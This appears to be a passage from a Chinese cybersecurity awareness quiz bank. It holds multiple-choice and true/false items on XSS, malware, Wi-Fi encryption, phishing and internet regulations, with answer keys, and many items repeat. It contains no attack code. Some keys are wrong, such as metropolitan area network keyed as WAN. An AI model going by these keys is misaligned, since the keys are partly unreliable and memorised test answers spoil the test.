A、 欺骗性Web链接

B、 真实的发送方地址

C、 一般性的问候

D、 要求采取行动的紧急请求

标准答案: B

43、下列对XSS攻击(跨站脚本攻击)描述正确的是( )

A、 XSS攻击指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意攻击用户的特殊目的。

B、 XSS攻击是DDOS攻击的一种变种。

C、 XSS攻击就是CC攻击。

D、 XSS攻击就是利用被控制的机器不断地向被攻击网站发送访问请求,迫使IIS 连接数超出限制,当CPU 资源或者带宽资源耗尽,那么网站也就被攻击垮了,从而达到攻击目的。

标准答案: A

44、黑客利用IP地址进行攻击的方法有( )。

A、 欺骗

B、 解密

C、 窃取口令

D、 发送病毒

标准答案: A

45、下列对XSS攻击(跨站脚本攻击)描述正确的是( )。

A、 XSS攻击指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中的html代码会被执行,从而达到恶意攻击用户的特殊目的

B、 XSS攻击是DDOS攻击的一种变种

C、 XSS攻击就是CC攻击

D、 XSS攻击就是利用被控制的机器不断地向被攻击网站发送访问请求,迫使IIS 连接数超出限制,当CPU 资源或者带宽资源耗尽,那么网站也就被攻击垮了,从而达到攻击目的

标准答案: A

46、下列网络攻击者称谓中,( )的技术含量通常最低。

A、 黑客

B、 脚本小子

C、 间谍

D、 网络恐怖分子

标准答案: B

47、秘密地将自己添加到文档或程序等宿主上,当文档被打开或程序被执行时执行的程序,称作( )。

A、 病毒

B、 蠕虫

C、 Rootkit

D、 木马

标准答案: A

48、病毒可以通过下列选项中除( )以外的方式从一台计算机传播到另一台计算机。

A、 作为电子邮件的被感染文件

B、 优盘上的被感染文件

C、 从互联网上下载的被感染文件

D、 重启计算机

标准答案: D

49、计算机病毒有很多种类型,但不包括( )。

A、 文件感染类病毒

B、 远程病毒

C、 内存驻留病毒

D、 引导区病毒

标准答案: B

50、 黑客要想控制某些用户,需要把木马程序安装到用户的机器中,实际上安装的是( )。

A、 木马的控制端程序

B、 木马的服务端程序

C、 不用安装

D、 控制端、服务端程序都必需安装

标准答案: B

1、防间谍软件要求下列选项中除( )以外的所有特性。

A、 定期更新以防止最新间谍软件攻击

B、 能提供连续性监控并能够完全扫描整个计算机

C、 能够显示威胁处理推荐动作的详细信息

D、 只有商业软件可用,需要按年付费

标准答案: D

2、 在TCP/IP参考模型中,应用层是最高的一层,它包括了所有的高层协议。下列协议中不属于应用层协议的是( )

A、 HTTP

B、 FTP

C、 UDP

D、 SMTP

标准答案: C

3、下列方法中,识别Email来源真实性最可靠的是( )。

A、 查看发件服务器地址

B、 查看发件人名称

C、 查看发件人地址

D、 查看回信地址

标准答案: A

4、下列选项中,除了( )以外都是杀毒软件发现病毒时的可选项。

A、 清除文件中的病毒

B、 隔离被感染文件

C、 发送邮件告诉攻击者病毒已暴露

D、 删除包含病毒的文件

标准答案: C

5、( )是一个预先定义的电子邮件地址列表,用户可以接收来自该列表中地址的邮件。

A、 僵尸网络

B、 黑名单blacklist

C、 白名单whitelist

D、 干净列表

标准答案: C

6、密码学包括密码编码学和密码解码学。( )

A、 对

B、 错

标准答案: B

7、可以通过配置( )来防止用户通过多次登录尝试来猜测其他人的密码

A、 密码策略

B、 账户锁定策略

C、 Kerberos策略

D、 审计策略

标准答案: B

8、Ping命令使用ICMP的哪一种Code类型( )。

A、 Redirect

B、 Echo reply

C、 Source quench

D、 Destination Unreachable

标准答案: B

9、在Linux系统中,修改口令策略和查看某个用户的口令策略分别是对如下哪两个文件进行操作( )。

A、 /etc/login.defs和/etc/shadow

B、 /etc/login.defs和/etc/passwd

C、 /etc/passwd和/etc/shadow

D、 /etc/shadow和/etc/login

标准答案: A

10、在信息系统安全中,风险由( )两种因素共同构成的。

A、 攻击和脆弱性

B、 威胁和攻击

C、 威胁和脆弱性

D、 威胁和破坏

标准答案: C

11、Windows系统中权限最高为( )。

A、 administrators

B、 power users

C、 guests

D、 system

标准答案: D

12、Windows紧急修复盘不能修复下列哪个项目( )。

A、 硬件兼容问题

B、 分区引导扇区

C、 启动环境

D、 系统文件

标准答案: A

13、Windows系统中“net share”命令的作用是( )。

A、 查看本机的共享资源

B、 创建本机的共享资源

C、 删除本机的共享资源

D、 查看局域网内其他主机的共享资源

标准答案: A

14、 Windows平台的可执行文件格式是( )。

A、 TXT

B、 PE

C、 ELF

D、 PPT

标准答案: B

15、网络安全中的CIA三元组指的是( )。

A、 机密性,完整性,可用性

B、 真实性,完整性,可控性

C、 机密性,真实性,可用性

D、 完整性,可用性,可控性

标准答案: A

16、信息安全的目标之一是确保数据对授权用户是可访问的,也称作( )目标。

A、 可用性

B、 完整性

C、 机密性

D、 机密性、完整性、和可用性

标准答案: A

17、以通过发现漏洞来提升安全性为目标的黑客,被称作( )。

A、 黑帽子黑客

B、 白帽子黑客

C、 牛仔攻击者

D、 资源攻击者

标准答案: B

18、在网络攻击的典型步骤中,攻击者在探查计算机或网络信息后,下一步将( )。

A、 修改网络安全配置

B、 穿透网络安全防护

C、 瘫痪网络和设备

D、 迂回到其他系统

标准答案: B

19、从不同厂家购买安全产品,希望一家产品的安全失效不会影响整个系统的安全性,这是利用( )来提升安全性。

A、 模糊性

B、 纵深防御

C、 限制性

D、 多样性

标准答案: D

20、( )是一个计算机程序或一个程序的一部分,它平时保持休眠直到被特定的逻辑事件触发。

A、 逻辑炸弹

B、 触发器

C、 蠕虫

D、 病毒

标准答案: A

21、当成百上千计算机被远程控制时就形成了( )。

A、 僵尸网络

B、 爬虫网络

C、 木马网络

D、 暗网

标准答案: A

22、( )被用于将文本、图像、音频和视频合并到一个单一文档中。

A、 TCP/IP

B、 HTML

C、 HTTP

D、 HSL

标准答案: B

23、现代计算机的基本输入输出系统(BIOS)存储在( )芯片上。

A、 银闪存

B、 基本输出/输入

C、 可编程只读存储器

D、 只读存储器

标准答案: C

24、RAID1 是一种( )的磁盘镜像技术。

A、 从磁盘读取数据两次

B、 数据写到多磁盘

C、 刷BIOS

D、 降低可靠性

标准答案: B

25、Cookie( )。

A、 可以包含病毒

B、 行为类似蠕虫

C、 可能带来隐私风险

D、 是在Web服务器计算机上放置的小文件

标准答案: C

26、关于键盘记录器,下列选项中除( )以外都是正确的。

A、 它可能是插在键盘连接器和计算机键盘端口之间的一个小设备

B、 它只搜集在网站上输入的信息

C、 击键记录被其搜集并存储为文档

D、 软件键盘记录器通常作为木马被下载和安装

标准答案: B

27、对社交网站上分享的内容应考虑设置“只有我的朋友”查看,这是因为_( )。

A、 社交网络上的朋友不可信

B、 社交网络对于谁能加入网络查看信息没有控制

C、 社交网络要求该选项

D、 攻击者不会假装成朋友

标准答案: B

28、服务器数字证书能验证组织的存在性和身份,并支持对通信内容的加密。访问带有服务器数字证书的网站时,浏览器会显示( )。

A、 绿色复选标记

B、 锁

C、 蓝色地球

D、 计算机

标准答案: B

29、程序和数据能够存储于其上的集中式网络计算机,称作( )。

A、 服务器

B、 客户端

C、 Web代理

D、 网络设备认证

标准答案: A

30、IP地址的一个例子是( )。

A、 $800922$9988

B、 14102009

C、 00:15:59:3B:30:C3

D、 192.168.11.100

标准答案: D

31、城域网又称为( )。

A、 WAN

B、 LAN

C、 PAN

D、 WPAN

标准答案: A

32、用户为了( )可以允许网络上的其他用户查看目录内容。

A、 文本传递

B、 网络认证

C、 目录分发

D、 文件共享

标准答案: D

33、对WiFi信号进行沿街扫描,不需要使用( )。

A、 USB无线网卡

B、 全方向天线

C、 移动计算机设备

D、 音频喇叭

标准答案: D

34、计算机网络按威胁对象大体可分为两种:一是对网络中信息的威胁; 二是( )

A、 人为破坏

B、 对网络中设备的威胁

C、 病毒威胁

D、 对网络人员的威胁

标准答案: B

35、在网络寻址过程中,将目标设备IP翻译为MAC地址的协议是( )

A、 ICMP

B、 DNS

C、 SNMP

D、 ARP

标准答案: D

36、信息安全管理最关注的是( )

A、 外部恶意攻击

B、 病毒对PC的影响

C、 内部恶意攻击

D、 病毒对网络的影响

标准答案: C

37、在需要保护的信息资产中( )是最重要的

A、 环境

B、 硬件

C、 数据

D、 软件

标准答案: C

38、美国国防部在他们公布的可信计算机系统评价标准中,将计算机系统的安全级别分为四类七个安全级别,其中描述不正确的是( )

A、 A类的安全级别比B类高

B、 C1类的安全级别比C2类要高

C、 随着安全级别的提高,系统的可恢复性就越高

D、 随着安全级别的提高,系统的可信度就越高

标准答案: B

39、甲通过计算机网络给乙发消息,说其同意签定合同。随后甲反悔,不承认发过该条消息。为了防止这种情况发生,应在计算机网络中采用( )。

A、 消息认证技术

B、 数据加密技术

C、 防火墙技术

D、 数字签名技术

标准答案: D

40、甲通过计算机网络给乙发消息,说其同意签定合同。随后甲反悔,不承认发过该条消息。为了防止这种情况发生,应在计算机网络中采用( )

A、 消息认证技术

B、 数据加密技术

C、 防火墙技术

D、 数字签名技术

标准答案: D

41、 数字信封技术能够( )

A、 对发送者和接受者的身份进行认证

B、 对发送者的身份进行认证

C、 防止交易中的抵赖发生

D、 保证数据在传输过程中的安全性

标准答案: D

42、 防止用户被冒名所欺骗的方法是( )。

A、 对信息源发方进行身份验证

B、 进行数据加密

C、 对访问网络的流量进行过滤和保护

D、 采用防火墙

标准答案: A

43、下列概念中,不能用于身份认证的手段是( )。

A、 限制地址和端口

B、 用户名和口令

C、 杀毒软

D、 智能卡

标准答案: C

44、利用他人的个人信息来开设银行账户进行消费,然后不予还款的行为属于( )。

A、 责任窃取

B、 个人假冒攻击

C、 借贷诈骗

D、 身份盗用

标准答案: D

45、提供证据表明用户身份真实性的过程称作( )。

A、 标识

B、 注册

C、 真实性验证

D、 身份认证

标准答案: D

46、将要输入到算法中进行加密的数据称作( )。

A、 明码电文

B、 公开文本

C、 密文

D、 明文

标准答案: D

47、下列关于预防网络攻击的说法正确的是( )

A、 现代服务器和 PC 操作系统具有可以信赖的默认安全设置。

B、 入侵防御系统可以记录可疑的网络活动,但在没有用户干预的情况下无法对抗正在进行的攻击。

C、 物理安全威胁的防范包括控制对设备控制台端口的访问、标识关键电缆、安装 UPS 系统以及提供温湿控制。

D、 防止网络钓鱼攻击的最好方法是采用防火墙设备。

标准答案: C

48、可以通过配置( )来防止用户通过多次登录尝试来猜测其他人的密码。

A、 密码策略

B、 账户锁定策略

C、 Kerberos策略

D、 审计策略

标准答案: B

49、PDRR一般是指信息安全保障中的( )等主要环节。

A、 策略、保护、响应、恢复

B、 加密、认证、保护、检测

C、 策略、网络攻防、密码学、备份

D、 保护、检测、响应、恢复

标准答案: D

50、PING命令使用ICMP的哪一种code类型:( )

A、 Redirect

B、 Echo reply

C、 Source quench

D、 Destination Unreachable

标准答案: B

1、如果想要限制用户过多的占用磁盘空间,应当( )

A、 设置磁盘配额

B、 设置数据压缩

C、 设置文件加密

D、 设置动态存储

标准答案: A

2、关于代理服务说法正确的是( )

A、 代理服务允许用户“直接”访问因特网,对用户来讲是透明的

B、 代理服务能够弥补协议本身的缺陷

C、 所有服务都可以进行代理

D、 代理服务不适合于做日志

标准答案: A

3、代理服务( )

A、 需要特殊硬件,大多数服务需要专用软件

B、 不需要特殊硬件,大多数服务需要专用软件

C、 需要特殊硬件,大多数服务不需要专用软件

D、 不需要特殊硬件,大多数服务不需要专用软件险

标准答案: B

4、 Ipsec不可以做到( )

A、 认证

B、 完整性检查

C、 加密

D、 签发证书

标准答案: D

5、小张经常出差,要在外地访问公司的财务信息系统,他应该采用的安全、廉价的通讯方式是( )

A、 PPP连接到公司的RAS服务器上。

B、 远程访问VPN

C、 电子邮件

D、 与财务系统的服务器PPP连接。

标准答案: B

6、 HTTP是( )。

A、 WWW协议

B、 文件传输协议

C、 信息浏览协议

D、 超文本传输协议

标准答案: D

7、SSL指的是( )

A、 加密认证协议

B、 安全套接层协议

C、 授权认证协议

D、 安全通道协议

标准答案: B

8、当无线路由器wifi密码安全类型为( ),最容易破解。

A、 WPA2-PSK

B、 WEP

C、 WPA-PSK

D、 WPA

标准答案: B

9、最低效的口令攻击类型是( )。

A、 暴力破解攻击

B、 字典攻击

C、 彩虹表攻击

D、 机器攻击

标准答案: A

10、无线路由器支持WEP、WPA、WPA2等方式的加密功能,它们的安全强度顺序为( )。

A、 WPA2>WPA>WEP

B、 WEP>WPA>WPA2

C、 WEP>WPA2>WPA

D、 都相同

标准答案: A

11、SSID(Service Set Identifier)( )。

A、 是无线网络标识符

B、 不能改变

C、 从不因任何安全原因由无线路由器发送

D、 在有线网络上必须少于4个字符

标准答案: A

12、试图阻止无线监听但又包含严重缺陷,现在不应再使用的标准是( )。

A、 WEP

B、 WAP-2

C、 NICW

D、 INFOMATICS

标准答案: A

13、保护无线网络的第一步是( )。

A、 创建用户名和口令,禁止非法用户访问无线路由器

B、 禁用无线路由器网络共享

C、 使用IP地址过滤

D、 取消非军事区

标准答案: A

14、将单位内部的局域网接入Internet(因特网)所需使用的接入设备是( )。

A、 防火墙

B、 集线器

C、 路由器

D、 中继转发器

标准答案: C

15、垃圾邮件过滤器( )。

A、 可由互联网服务提供商使用来拦截消息

B、 只能由本地电子邮件客户端使用

C、 要求同时创建黑名单和白名单

D、 只能被POP3服务器使用

标准答案: A

16、来自于多个攻击源而不是单一攻击源的攻击,称作( )攻击。

A、 分布式

B、 隔离

C、 脚本资源恶意软件

D、 表格资源

标准答案: A

17、下列哪个 IPv4 地址代表子网的广播地址( )

A、 172.16.4.129 /26

B、 172.16.4.191 /26

C、 172.16.4.51 /27

D、 172.16.4.221 /27

标准答案: B

18、可以被数据完整性机制防止的攻击方式是( )。

A、 假冒源地址或用户的地址欺骗攻击

B、 抵赖做过信息的递交行为

C、 数据中途被攻击者窃听获取

D、 数据在途中被攻击者篡改或破坏

标准答案: D

19、黑客利用IP地址进行攻击的方法有( )

A、 IP欺骗

B、 解密

C、 窃取口令

D、 发送病毒

标准答案: A

20、在OSI七层协议中,提供一种建立连接并有序传输数据的方法的层是( )。

A、 传输层

B、 表示层

C、 会话层

D、 应用层

标准答案: C

21、操作系统经常需要进行补丁升级,在进行补丁升级时通常需要管理员权限,因此在使用电脑的过程中,我们应该尽可能地使用管理员帐户登录系统进行日常操作。 ( )

A、 对

B、 错

标准答案: B

22、网络管理的功能有( )。

A、 性能分析和故障检测

B、 安全性管理和计费管理

C、 网络规划和配置管理

D、 以上都是

标准答案: D

23、如果想要限制用户过多的占用磁盘空间,应当( )。

A、 设置磁盘配额

B、 设置数据压缩

C、 设置文件加密

D、 设置动态存储

标准答案: A

24、在需要保护的信息资产中( )是最重要的。

A、 环境

B、 硬件

C、 数据

D、 软件

标准答案: C

25、让攻击者“进不来”“拿不走”“看不懂”“改不了”“走不脱”是网络信息安全建设的目的。其中,“看不懂”是指( )安全服务。

A、 数据加密

B、 身份认证

C、 数据完整性

D、 访问控制

标准答案: A

26、“计算机可能被盗”是( )的一个例子。

A、 漏洞利用

B、 漏洞

C、 资产

D、 风险

标准答案: D

27、关于临时互联网文件目录,下述说法中除( )以外都是正确的。

A、 是浏览器首先检查是否已经存储了HTML文档的位置

B、 是存储特殊加密文件的地方

C、 应该定期删除

D、 永远不应该删除

标准答案: D

28、除个人计算机里文件的共享功能,可以( )。

A、 将文件加密

B、 将计算机80端口封闭

C、 将计算机里的Server服务关闭

D、 将计算机里的System进程关闭

标准答案: C

29、小王是网管,为了监听攻击效果最好,监听设备不应放在( ) 。

A、 网关

B、 路由器

C、 中继器

D、 防火墙

标准答案: C

30、个人电脑中使用netstat命令查看进程识别符(PID)配合资源管理器查看是否有病毒等恶意进程与外界非法通讯,netstat命令需要配合增加的参数是( )。

A、 netstat -a

B、 netstat -s

C、 netstat -o

D、 netstat–ano

标准答案: D

31、下列选项中除( )以外都是社交网站成为网络攻击主要目标的原因。

A、 社交网站采用强安全措施

B、 社交网站包含私人用户信息

C、 这些网站上的用户通常容易轻信

D、 这些网站上可能找到生日、住址、工作历史等信息

标准答案: A

32、下列选项中,除( )以外都可能是身份盗用行为。

A、 制作假支票或借记卡,从银行账户中转走所有的钱

B、 以受害人的名字来申请破产,以逃避债务

C、 以用户的名字开设银行账户,并利用该账户开不良支票

D、 向网上银行账户系统发送蠕虫

标准答案: D

33、攻击者为了使恶意软件具有较长的生命周期,通常需要对其进行免杀处理。这种免杀处理主要是对抗()。

A、 特征码检测

B、 虚拟机

C、 启发式扫描

D、 主动防御

标准答案: A

34、( )用于描述损害用户个人信息安全的软件。

A、 间谍软件Spyware

B、 恶意软件Malware

C、 广告软件Ad ware

D、 网络操作系统Netware

标准答案: B

35、社会工程是指需要整个社会共同关注、共同努力、能对整个社会的产生积极影响的重大规划和项目,譬如全社会网络用户上网安全意识的培训。 ( )

A、 对

B、 错

标准答案: B

36、( )是攻击者安装在计算机上的程序,它篡改Web浏览器的主页和搜索引擎将其指向其它站点。

A、 IE重定位器

B、 互联网服务器重定位器

C、 IMAPI

D、 浏览器劫持软件

标准答案: D

37、还未公开的漏洞,称作( )漏洞?

A、 未识别攻击向量

B、 资源

C、 不确定

D、 零日

标准答案: D

38、用于修复软件发布之后所发现漏洞的安全更新,称作( )。

A、 密钥

B、 资源

C、 更新发布程序

D、 补丁

标准答案: D

39、攻击者使用( )技术在被攻击主机内存中插入一个新的“返回地址”,并使其指向包含攻击者提供的恶意代码的内存区地址。

A、 缓冲区溢出攻击

B、 木马攻击

C、 文件上传攻击

D、 蠕虫攻击

标准答案: A

40、下列关于超链接的说法除( )以外都是正确的。

A、 经常可以在电子邮件消息中发现

B、 他们可能显示的不是真实的链接目标

C、 已经很少使用了

D、 需要用户点击才能启动

标准答案: C

41、( )是指有能力带来威胁的人或事物。

A、 漏洞

B、 威胁代理

C、 漏洞利用

D、 风险因子

标准答案: B

42、( )操作可能会威胁到智能手机的安全性。

A、 越狱

B、 Root

C、 安装来自第三方市场的软件

D、 以上都是

标准答案: D

43、 将U盘插入到在公用电脑上,当电脑检测到U盘之后迅速按照正常程序卸载并弹出U盘,该操作过程是不会导致U盘中涉密文件泄密的。 ( )

A、 对

B、 错

标准答案: B

44、下列关于Android的描述正确的是( )。

A、 默认不支持对APP的权限进行限制,所以比iOS的安全性差

B、 默认不能安装配套市场以外的APP,但是经过用户授权后可以安装

C、 在屏幕被锁定时,默认不允许拨打任何电话号码

D、 即使被种植了木马,只要屏幕不解锁,木马也不能执行

标准答案: B

45、木马程序通常是恶意攻击者入侵到我们的电脑之后植入的,很少因为用户自己的原因导致木马植入。( )

A、 对

B、 错

标准答案: B

46、绿色上网软件可以自动过滤或屏蔽互联网上的( )保护青少年健康成长。

A、 网络游戏

B、 网络聊天信息

C、 淫秽色情信息

D、 好莱坞等电影大片

标准答案: C

47、数据文件不具有可执行性的特点,因此在一台干净的计算机上仅仅打开一个外来的数据文件(如Word文档、Pdf文档等)是不可能导致该计算机被感染病毒的。 ( )

A、 对

B、 错

标准答案: B

48、网络视频聊天相对于文字聊天而言具有较高的安全性,因为网络视频聊天是面对面的交流,是不可伪造的。但视频聊天却具有众多安全隐患,譬如可能被人录像等。( )

A、 对

B、 错

标准答案: B

49、“联网计算机不涉密,涉密计算机不联网”是指,计算机在上网的时候不能查看涉密信息,计算机涉密的时候不能连接互联网。( )

A、 对

B、 错

标准答案: B

50、对称密码系统的加密密钥和解密密钥相同,或存在简单推导关系,因此又被称为( )。

A、 单钥密码系统

B、 公/私钥密码系统

C、 公钥密码系统

D、 双钥密码系统

标准答案: A

1、在iPhone安装新浪微博客户端,正确的做法是( )。

A、 进入【App Store】,搜索“新浪微博”,然后安装

B、 下载“新浪微博”程序,使用数据线拷贝到iPhone上,然后安装

C、 直接将互联网上下载的“新浪微博”程序拷贝到iPhone即可

D、 以上都不对

标准答案: A

2、Rootkit的主要目标是( )。

A、 隐藏其存在

B、 重新格式化硬盘

C、 复制到其他计算机

D、 启动僵尸网络

标准答案: A

3、Cookie______。

A、 可以包含病毒

B、 行为类似蠕虫

C、 可能带来隐私风险

D、 是在Web服务器计算机上放置的小文件

标准答案: C

4、用于修复软件发布之后所发现漏洞的安全更新,称作______。

A、 密钥

B、 资源

C、 更新发布程序

D、 补丁

标准答案: D

5、秘密地将自己添加到文档或程序等宿主上,当文档被打开或程序被执行时执行的程序,称作______。

A、 病毒

B、 蠕虫

C、 Rootkit

D、 木马

标准答案: A

6、病毒通常修改目标程序的()字段达到获得控制权的目的。

A、 ImageBase

B、 PointerToRawData

C、 PointerToSymbleTable

D、 AddressOfEntryPoint

标准答案: D

7、在以下反病毒对抗技术中,________技术是目前绝大部分反病毒软件必须具备的最核心的技术之一。

A、 特征码检测

B、 启发式扫描

C、 虚拟机

D、 主动防御

标准答案: A

8、远程控制型木马与远程管理软件之间的最大区别在于_________。

A、 是否可以传播

B、 是否存在变种

C、 是否为独立的程序

D、 是否获得被控制端授权

标准答案: D

9、熊猫烧香病毒采用了捆绑式感染,其缺陷是被感染程序的图标会发生变化。如果让被感染程序的图标保持不变,则需要修改目标程序的()。

A、 代码节

B、 数据节

C、 资源节

D、 图标节

标准答案: C

10、中央提出要大力培育____ 的“四有”中国好网民。 1.有高度的安全意识 2.有文明的网络素养 3.有守法的行为习惯 4.有必备的防护技能 5.有文明的网络礼仪

A、 2345

B、 1234

C、 1235

D、 1345

标准答案: B

11、在服务器出现故障时进行接管的服务器称作______。

A、 故障保护服务器

B、 回滚服务器

C、 对称服务器集群

D、 非对称服务器集群

标准答案: A

12、从本质上讲,计算机病毒是一种( )。

A、 细菌

B、 文本

C、 程序

D、 微生物

标准答案: C

13、对社交网站上分享的内容应考虑设置“只有我的朋友”查看,这是因为______。

A、 社交网络上的朋友不可信

B、 社交网络对于谁能加入网络查看信息没有控制

C、 社交网络要求该选项

D、 攻击者不会假装成朋友

标准答案: B

14、《全国青少年网络文明公约》内容包括____。 1.要善于网上学习,不浏览不良信息。 2.要诚实友好交流,不侮辱欺诈他人。 3.要增强自护意识,不随意约会网友。 4.要维护网络安全,不破坏网络秩序。

A、 2345

B、 1245

C、 1235

D、 12345

标准答案: D

15、利用他人的个人信息来开设银行账户进行消费,然后不予还款的行为属于______

A、 责任窃取

B、 个人假冒攻击

C、 借贷诈骗

D、 身份盗用

标准答案: D

16、下列选项中除______以外都是社交网站成为网络攻击主要目标的原因。

A、 社交网站采用强安全措施

B、 社交网站包含私人用户信息

C、 这些网站上的用户通常容易轻信

D、 这些网站上可能找到生日、住址、工作历史等信息

标准答案: A

17、 根据相关规定,每年______开展国家网络安全宣传周。

A、 6月份

B、 11月份

C、 9月份第三周

D、 八月十五中秋节

标准答案: C

18、靠欺骗别人来获得安全敏感信息的方式被称作______。

A、 社会工程学

B、 魔法攻击

C、 暴力破解攻击

D、 诡计攻击

标准答案: A

19、根据《互联网上网服务营业场所管理条例》规定,中学、小学校园周围________米范围内和居民住宅楼(院)内不得设立互联网上网服务营业场所。

A、 200

B、 300

C、 500

D、 1000

标准答案: A

20、《互联网上网服务营业场所管理条例》规定,互联网上网服务营业场所经营单位____。

A、 可以接纳未成年人进入营业场所

B、 可以在成年人陪同下,接纳未成年人进入营业场所

C、 不得接纳未成年人进入营业场所

D、 可以在白天接纳未成年人进入营业场所

标准答案: C

21、遇到不良信息,可以到下列选项中除________以外的网站进行举报。

A、 12321.cn,电话12321

B、 12377.cn,电话12377

C、 www.shdf.gov.cn,电话12390

D、 12306.cn,电话12306

标准答案: D

22、列选项中不属于垃圾邮件过滤技术的是______。

A、 软件模拟技术

B、 贝叶斯过滤技术

C、 关键字过滤技术

D、 黑名单技术

标准答案: A

23、 对于通过邮件发送的“连环信”,应该______。

A、 如果是有关病毒的预防信息,应转发给尽可能多的人

B、 只转发给朋友

C、 检查真实性之后再转发

D、 按照处理纸质垃圾信件的方式丢弃

标准答案: D

24、对于通过邮件发送的“连环信”,应该______。

A、 如果是有关病毒的预防信息,应转发给尽可能多的人

B、 只转发给朋友

C、 检查真实性之后再转发

D、 按照处理纸质垃圾信件的方式丢弃

标准答案: D

25、将要输入到算法中进行加密的数据称作______。

A、 明码电文

B、 公开文本

C、 密文

D、 明文

标准答案: D

26、对称密码系统的加密密钥和解密密钥相同,或存在简单推导关系,因此又被称为______。

A、 单钥密码系统

B、 公/私钥密码系统

C、 公钥密码系统

D、 双钥密码系统

标准答案: A

27、撞库得手的原因是______。

A、 用户扫描不安全的二维码

B、 用户为图省事,在许多网站设置相同的用户名和口令

C、 用户电脑被植入木马

D、 用户连接不安全的无线网络导致

标准答案: B

28、在Windows系统中下列账户不是合法账户的是______

A、 abcABC

B、 abc_123

C、 abc123$

D、 abc123*

标准答案: D

29、______是位于安全网络边界之外的一个隔离网络。

A、 非军事区

B、 端口复制区

C、 安全网络环境

D、 防火墙沙盒

标准答案: A

30、网络礼仪的黄金规则是______。

A、 记住人的存在

B、 永远不惹怒朋友

C、 遵守所有其它的网络礼仪规则

D、 每条消息都包含一个笑脸

标准答案: A

31、根据相关规定,每年______开展国家网络安全宣传周。

A、 6月份

B、 11月份

C、 9月份第三周

D、 八月十五中秋节

标准答案: C

32、国家级网络安全青少年科普基地位于 ______。

A、 中国科技馆

B、 国家图书馆

C、 西单电影院

D、 首都博物馆

标准答案: A

33、《互联网上网服务营业场所管理条例》规定,互联网上网服务营业场所经营单位____。

A、 可以接纳未成年人进入营业场所

B、 可以在成年人陪同下,接纳未成年人进入营业场所

C、 不得接纳未成年人进入营业场所

D、 可以在白天接纳未成年人进入营业场所

标准答案: C

34、遇到不良信息,可以到下列选项中除________以外的网站进行举报

A、 12321.cn,电话12321

B、 12377.cn,电话12377

C、 www.shdf.gov.cn,电话12390

D、 12306.cn,电话12306

标准答案: D

35、《文明上网自律公约》内容包括________。 ①自觉遵纪守法,倡导社会公德,促进绿色网络建设; ②提倡自主创新,摒弃盗版剽窃,促进网络应用繁荣; ③提倡诚实守信,摒弃弄虚作假,促进网络安全可信; ④提倡人人受益,消除数字鸿沟,促进信息资源共享。

A、 ②③④

B、 ①②④

C、 ①②③

D、 ①②③④

标准答案: D

36、《全国青少年网络文明公约》内容包括____。 ①要善于网上学习,不浏览不良信息。 ②要诚实友好交流,不侮辱欺诈他人。 ③要增强自护意识,不随意约会网友。 ④要维护网络安全,不破坏网络秩序。 ○5要有益身心健康,不沉溺虚拟时空。

A、 2345

B、 1245

C、 1235

D、 12345

标准答案: D

37、中央提出要大力培育____ 的“四有”中国好网民。 ○1有高度的安全意识 ○2有文明的网络素养 ○3有守法的行为习惯 ○4有必备的防护技能 ○5有文明的网络礼仪

A、 2345

B、 1234

C、 1235

D、 1345

标准答案: B

38、计算机网络按威胁对象大体可分为两种:一是对网络中信息的威胁; 二是______

A、 人为破坏

B、 对网络中设备的威胁

C、 病毒威胁

D、 对网络人员的威胁

标准答案: B

39、Windows系统中“net share”命令的作用是( )

A、 查看本机的共享资源

B、 创建本机的共享资源

C、 删除本机的共享资源

D、 查看局域网内其他主机的共享资源

标准答案: A

40、当安装完Windows操作系统后,在系统盘里会出现“pagefile.sys”隐藏文件,且文件占用空间较大,此文件的作用是(

A、 物理内存

B、 EPROM

C、 ROM

D、 虚拟内存

标准答案: D

41、个人移动终端的数据保护策略,除了数据加密还有( )

A、 移动终端的数据备份与还原

B、 使用安全的无线接入点

C、 关闭WLAN功能,开启3G/4G功能

D、 不要使自己的移动终端成为WiFi热点

标准答案: A

42、 有一些信息安全事件是由于信息系统中多个部分共同作用造成的,人们称这类事件为“多组件事故”,应对这类安全事件最有效的方法是( )

A、 配置网络入侵检测系统以检测某些类型的违法或误用行为

B、 使用防病毒软件,并且保持更新为最新的病毒特征码

C、 将所有公共访问的服务放在网络非军事区(DMZ)

D、 使用集中的日志审计工具和事件关联分析软件

标准答案: D

43、从加密类型分析,当无线路由器WIFI密码安全类型为______时,最容易破解

A、 WPA2-PSK

B、 WEP

C、 WPA-PSK

D、 WPA

标准答案: B

44、WPA2的目的是______。

A、 通过经常修改口令来锁住无线路由器

B、 限制下载量

C、 限制用户传输量

D、 加密传输

标准答案: D

45、SSL协议要求建立在______协议之上。

A、 HTTP

B、 IP

C、 TCP

D、 SMTP

标准答案: C

46、 单位内部做的路由表中元素不包含( )

A、 源IP地址

B、 目的IP地址

C、 子网掩码

D、 下一跳地址

标准答案: A

47、某客户端采用ping命令检测网络连接故障时,发现可以ping通127.0.0.1及本机的IP地址,但无法ping通同一网段内其他工作正常的计算机的IP地址。该客户端的故障可能是( )

A、 TCP/IP协议不能正常工作

B、 本机网卡不能正常工作

C、 本机网络接口故障

D、 DNS服务器地址设置错误

标准答案: C

48、公司需要使用域控制器来管理,安装域控制器须具备

A、 操作系统版本是Windows server2008或者Windows XP

B、 本地磁盘至少有一个NTFS分区

C、 本地磁盘必须全部是NTFS分区

D、 有相应的DNS服务器支持

标准答案: B

49、为了降低分析,不建议使用的Internet服务是(

A、 web服务

B、 外部访问内部系统

C、 内部访问Internet

D、 FTP服务

标准答案: D

50、代理服务是指______

A、 需要特殊硬件,大多数服务需要专用软件

B、 不需要特殊硬件,大多数服务需要专用软件

C、 需要特殊硬件,大多数服务不需要专用软件

D、 不需要特殊硬件,大多数服务不需要专用软件险

标准答案: B

1、关于代理服务说法正确的是______

A、 代理服务允许用户“直接”访问因特网,对用户来讲是透明的

B、 代理服务能够弥补协议本身的缺陷

C、 所有服务都可以进行代理

D、 代理服务不适合于做日志

标准答案: A

2、下述关于IPv6论述中不正确的是( )

A、 IPV6具有高效IP包头

B、 IPV6增强了安全性

C、 IPV6地址采用64位

D、 IPV6采用主机地址自动配置

标准答案: C

3、IPSec不可以做到( )

A、 认证

B、 完整性检查

C、 加密

D、 签发证书

标准答案: D

4、网络地址转换(Network Address Translation,NAT)______。

A、 仅能被用于大型企业网络

B、 因为太复杂所以不能被用于无线网络

C、 将网络设备的地址对攻击者隐藏

D、 提供有限安全性并且已被MAC地址过滤取代

标准答案: C

